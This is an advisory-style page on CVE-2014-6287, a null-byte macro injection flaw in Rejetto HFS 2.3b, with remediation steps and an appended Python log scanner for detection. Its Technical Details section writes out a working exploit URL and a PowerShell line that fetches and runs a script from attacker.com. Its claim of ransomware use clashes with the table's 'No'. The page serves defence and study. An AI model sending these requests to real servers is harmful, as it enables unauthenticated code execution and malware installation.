CVE-2014-6287 — Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability

CVE-2014-6287

Rejetto HFS 2.3b — Null Byte Macro Injection in Search Enables Unauthenticated Remote Code Execution; Staple of Ransomware and Malware Campaigns

What Is Rejetto HTTP File Server?

Rejetto HTTP File Server (HFS) is a free, open-source file server for Windows that allows users to share files via a web browser without complex server setup. It is a single-executable application widely used by individuals and small teams for ad-hoc file sharing, software distribution, and as a quick web server during CTF competitions and penetration tests. HFS includes a scripting engine using "macros" — commands like {.exec|cmd.} that can run OS commands — which is a powerful feature that becomes a critical vulnerability when the macro execution can be triggered without authentication.

Overview

Actively Exploited. This vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on March 25, 2022. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2014-6287 is a critical remote code execution vulnerability in Rejetto HTTP File Server (HFS) version 2.3b. The findMacroMarker function in parserLib.pas fails to properly handle null bytes in search strings, allowing an attacker to inject and execute arbitrary HFS macro commands via a crafted HTTP request. No authentication is required. A simple GET request can run any OS command — including downloading and executing malware — on the server. This vulnerability has been exploited by ransomware operators, cryptominer distributors, and APT groups for initial access, and remains one of the most commonly exploited vulnerabilities in mass scanning campaigns.

Affected Versions

HFS Version Status
2.3b Vulnerable
2.3c and later Fixed (null byte handling corrected)

Technical Details

Root Cause: Null Byte Truncation in Macro Parser

HFS 2.3b's template system uses macros — commands enclosed in {. .} brackets — that can call built-in functions including exec (execute OS commands). The search functionality passes user-supplied input to the macro parser. The findMacroMarker function in parserLib.pas uses null byte (%00) as a string terminator, similar to C string handling.

When a null byte is injected in a search query, the portion of the URL before the null byte is treated as the actual search string, while the portion after the null byte is parsed as a template containing macros. This allows injecting macro syntax directly into the search parameter:

Exploit URL:

GET /?search=%00{.exec|cmd.exe+/c+whoami.}

The null byte causes the parser to treat everything after %00 as a template, executing the exec macro. The server runs the command and returns output in the response.

One-line reverse shell:

GET /?search=%00{.exec|powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://attacker.com/shell.ps1')".}

Attack Characteristics

Attribute Detail
Attack Vector Network — HTTP GET request
Authentication Required None
Complexity Very Low — single HTTP request
Execution Context HFS process user (often Administrator on Windows)
CVSS 9.8 CRITICAL
Popular in CTFs Yes — standard beginner/intermediate exploitation challenge

Discovery

Discovered and published by security researcher Daniele Linguaglossa, with the exploit published to Exploit-DB (EDB-34926) in September 2014.

Exploitation Context

  • Mass scanning: CVE-2014-6287 is scanned for and exploited continuously by automated attack infrastructure; any internet-accessible HFS 2.3b instance will be compromised within hours of exposure
  • Ransomware initial access: Multiple ransomware groups, including criminal actors using the Metasploit module, use HFS RCE exploits for initial access to Windows systems running file-sharing servers
  • Cryptominer distribution: Cryptomining malware (Monero miners, etc.) is frequently deployed via CVE-2014-6287 on internet-exposed HFS instances
  • APT initial access: Nation-state actors have been observed using HFS exploitation as part of opportunistic initial access operations
  • Metasploit module: exploit/windows/http/rejetto_hfs_exec — included in Metasploit Framework, making exploitation accessible to any operator
  • CTF staple: CVE-2014-6287 is one of the most commonly used vulnerabilities in beginner CTF challenges (HackTheBox, TryHackMe machines), which has kept exploitation skills and tools widely practiced
  • CISA KEV (2022): Added March 2022, nearly eight years after discovery — confirming HFS 2.3b instances remain actively exploited

Remediation

CISA BOD 22-01 Deadline: April 15, 2022. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

  1. Update HFS to version 2.3c or later — the null byte handling was corrected in 2.3c.

  2. If HFS must be used: Ensure it is never internet-accessible. Place behind a firewall and restrict access to trusted IP ranges. HFS is a personal/LAN tool; it should never be exposed to the public internet.

  3. Audit for exploitation: Check HFS logs for requests containing %00 or {.exec in the search parameter. A compromised HFS server should be treated as fully compromised — reimage the host and rotate all credentials on the system.

  4. Consider replacing HFS with a properly hardened file-sharing solution (e.g., SFTP server, SharePoint, or a properly configured web server with authentication) for any production use case.

  5. Network monitoring: Deploy rules to detect HTTP requests containing null bytes followed by HFS macro patterns ({.exec|, {.script|).
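As an added example (not part of the original advisory), a small Python scanner that applies the audit guidance in steps 3 and 5 to access-log lines: it percent-decodes the search parameter, checks for a null byte, and flags the {.exec| and {.script| macro markers named above, including percent-encoded forms of the same payload. The log layout, the REQUEST_RE pattern and the sample lines are constructed; HFS's own log format may differ, so adapt the pattern to the real log.

```python
"""Flag CVE-2014-6287 style macro injection in CLF-style access logs (added
example; the log layout is constructed, not HFS's own log format)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Macro markers the advisory names as exploitation indicators.
MACRO_MARKERS = ("{.exec|", "{.script|")
# Request-target from a CLF request field, e.g. "GET /?search=x HTTP/1.1".
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target):
    """Return reasons the request-target looks like an HFS macro injection
    attempt; an empty list means nothing suspicious was found."""
    reasons = []
    # parse_qsl percent-decodes, so %00 becomes '\x00' and %7B becomes '{'.
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key.lower() != "search":
            continue
        has_null = "\x00" in value
        if has_null:
            reasons.append("null byte in search parameter")
        # HFS 2.3b parses the text after the null byte as a template.
        after_null = value.split("\x00", 1)[1] if has_null else ""
        for marker in MACRO_MARKERS:
            if marker in after_null:
                reasons.append(f"macro marker {marker} after null byte")
            elif marker in value:
                reasons.append(f"macro marker {marker} in search parameter")
    return reasons


def scan_log(lines):
    """Return (line_number, request_target, reasons) for suspicious lines."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reasons = classify_request(match.group("target")) if match else []
        if reasons:
            hits.append((number, match.group("target"), reasons))
    return hits


# Constructed sample log: line 2 is the advisory's own exploit URL, line 3 the
# same payload percent-encoded, line 4 a macro marker without a null byte.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2014:10:00:01 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '192.0.2.44 - - [11/Sep/2014:10:00:07 +0000] "GET /?search=%00{.exec|cmd.exe+/c+whoami.} HTTP/1.1" 200 128',
    '192.0.2.44 - - [11/Sep/2014:10:00:09 +0000] "GET /?search=%00%7B.exec%7Ccmd.exe+/c+whoami.%7D HTTP/1.1" 200 128',
    '192.0.2.44 - - [11/Sep/2014:10:00:12 +0000] "GET /?search=%7B.exec%7Cwhoami.%7D HTTP/1.1" 200 64',
    '192.0.2.10 - - [11/Sep/2014:10:00:30 +0000] "GET /files/readme.txt HTTP/1.1" 200 2048',
]
```

Running scan_log(SAMPLE_LOG) reports lines 2, 3 and 4; a hit on a real server should trigger the "treat as fully compromised" response from step 3 rather than just a log entry.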

Key Details

Property Value
CVE ID CVE-2014-6287
Vendor / Product Rejetto — HTTP File Server (HFS)
NVD Published 2014-10-07
NVD Last Modified 2025-10-22
CVSS 3.1 Score 9.8
CVSS 3.1 Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity CRITICAL
CWE CWE-94 — Improper Control of Generation of Code ('Code Injection')
CISA KEV Added 2022-03-25
CISA KEV Deadline 2022-04-15
Known Ransomware Use No

CVSS 3.1 Breakdown

Metric Value
Attack Vector Network
Attack Complexity Low
Privileges Required None
User Interaction None
Scope Unchanged
Confidentiality High
Integrity High
Availability High

Required Action

CISA BOD 22-01 Deadline: 2022-04-15. Apply updates per vendor instructions.

Timeline

Date Event
2014-09-11 CVE-2014-6287 publicly reported; Exploit-DB entry 34926 published
2014-10-07 CVE-2014-6287 published by NVD
2022-03-25 Added to CISA Known Exploited Vulnerabilities catalog
2022-04-15 CISA BOD 22-01 remediation deadline

References

Resource Type
NVD — CVE-2014-6287 Vulnerability Database
CISA KEV Catalog Entry US Government
Exploit-DB 34926 — HFS 2.3b Remote Code Execution Security Research
Rejetto HFS Official Site Vendor Advisory